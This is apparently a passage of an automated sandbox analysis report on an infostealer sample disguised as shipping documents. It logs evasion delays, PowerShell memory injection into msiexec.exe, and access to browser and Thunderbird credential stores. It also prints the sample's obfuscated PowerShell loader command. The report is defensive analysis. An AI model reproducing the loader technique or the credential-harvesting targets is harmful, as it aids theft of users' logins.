            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599104Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598996Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598664Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598420Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598092Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595682Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595357Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595026Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594921Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594593Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7933Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1611Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeEvaded block: after key decisiongraph_0-3901
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -21213755684765971s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4196Thread sleep count: 3145 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4196Thread sleep count: 6704 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599435s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -599104s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598996s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598664s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598420s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -598092s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597546s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596671s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595682s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595468s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595357s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595250s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595140s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -595026s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -594921s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -594812s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092Thread sleep time: -594593s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00406719
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_004065CF FindFirstFileW,FindClose,0_2_004065CF
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599104Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598996Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598664Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598420Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598092Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595682Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595357Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595026Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594921Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594593Jump to behavior
            Source: msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: msiexec.exe, 00000006.00000002.3291573272.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000006.00000002.3291573272.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr*og
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeAPI call chain: ExitProcess graph end nodegraph_0-3787
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_045AD41C LdrInitializeThunk,1_2_045AD41C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3DC0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 37FA3CJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_7347114E GetModuleFileNameW,GlobalAlloc,CharPrevW,CloseHandle,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,lstrcpyW,lstrcpyW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,lstrcpyW,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,lstrcpyW,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,CharNextExA,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_7347114E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036FC

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
